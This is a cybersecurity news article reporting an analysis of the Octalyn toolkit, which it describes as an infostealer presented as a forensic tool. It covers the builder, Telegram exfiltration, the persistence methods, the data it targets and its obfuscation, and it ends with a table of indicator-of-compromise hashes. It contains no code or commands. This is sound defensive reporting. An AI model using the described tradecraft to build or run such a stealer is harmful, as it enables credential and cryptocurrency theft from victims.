The Octalyn Forensic Toolkit, a publicly available project on GitHub, is gaining notoriety in the cybersecurity community after a deep technical analysis revealed its core functionality is that of a comprehensive credential stealer.
Despite its self-proclaimed educational and research purposes, Octalyn exhibits all the hallmarks of a well-crafted infostealer targeting a wide range of sensitive data on Windows systems.
At its core, Octalyn is composed of a C++-based data-extracting payload distributed with the help of a Delphi-built builder utility, providing an easy-to-use graphical interface which enables even unskilled threat actors to seamlessly generate fully functional, stealer-laden binaries.
The builder requires only a Telegram bot token and a chat ID, instantly configuring the malware for live exfiltration of harvested data over an encrypted Telegram channel.
Modular Architecture
Technical analysis indicates that the Octalyn toolkit leverages both Delphi and C++ to maintain a lightweight, modular, and evasive posture.
The builder (Build.exe) acts as an initial dropper, unpacking and deploying multiple heavily obfuscated executables such as TelegramBuild.exe, rvn.exe, and assembly.exe into the system’s temporary directory.
These components use typical Windows APIs like GetTempPathA and ShellExecuteA to position themselves discreetly, with high entropy in file resources suggesting extensive packing and anti-analysis measures.
Entropy scores above 7, and in some cases peaking at 7.8, demonstrate deliberate efforts to impede static detection and reverse engineering.
On execution, the malware prepares a well-organized working directory, dubbed “0ctalyn,” within the victim’s temporary file space.
Within this enclave, separate folders are created for cryptocurrency wallets, browser cookies, credentials, VPN configurations, Discord, and gaming accounts. Chrome, Edge, and Opera’s authentication data is systematically hunted, decrypted, and archived.
Specific categories such as Crypto wallets are further subdivided to reflect coins and wallet types, ensuring all private keys, configuration files, and browser extension data are efficiently arranged for attacker review.
Secondary Payload Delivery
To guarantee a lasting foothold, Octalyn automatically establishes persistence via two mechanisms: copying its payload (rvn.exe) to the Windows Startup folder and registering a new Run key in the Windows Registry.
According to Cyfirma Report, this dual approach complicates manual removal and supports long-term surveillance or exploitation.
Data exfiltration is handled almost exclusively over Telegram, with tokens and chat IDs hardcoded in the resources for seamless bot communication.
Once collection is finished, exfiltrated data is zipped using PowerShell scripts and transferred through Telegram’s encrypted API, employing structured filenames that incorporate the victim’s username for streamlined attacker-side management.
Advanced behavioral analysis revealed additional malicious routines such as stealthy PowerShell-encoded stage-two payload downloads from GitHub though these files were not present at the time of investigation.
The infrastructure for hosting second-stage malware remains live, signaling clear intent and readiness for ongoing campaigns.
Octalyn’s potent blend of ease of deployment, attention to anti-analysis, and broad targeting (notably, financial and cryptocurrency data) underlines its appeal for cybercriminal operations.
While positioned as a digital forensic utility, its practical features align with those found in established infostealers, raising red flags about potential large-scale abuse.
Ongoing maintenance of associated GitHub repositories and Telegram bot infrastructure indicates persistence and active development from the threat actor.
Security teams are urged to monitor for the following indicators of compromise in network and endpoint environments.
Indicators of Compromise (IOC)
| S. No | Indicator | Type | Context |
|---|---|---|---|
| 1 | 8bd9925f7b7663ca2fcb305870248bd5de0c684342c364c24ef24bffbcdecd8b | EXE | Octalynstealer.exe |
| 2 | 3b3a096a9c507529919f92154f682490fa8e135f3460549a917cf23113a7b828 | DLL | Build.exe |
| 3 | 8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34 | EXE | rvn.exe |
| 4 | cea94fd48ef98f6e9db120cdb33fa1099846ebcf9e6d6f8de3b53250d2087f0a | EXE | asembly.exe |
| 5 | 8af7fc21bc9c13d877f598886f363a4c7c1105bcda18e17db74d7e1584a9cae2 | EXE | TelegramBuild.exe |
| 6 | abe96669d90f52529b5dad847f43961a4b8b56c3893f6233a404b688c5a6069e | EXE | svchost.exe |
| 7 | 44778cf0de10af616ef2d8a5cc5048f7cf0faa204563eab590a1a9ea4a168ef7 | EXE | binder.exe |
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates
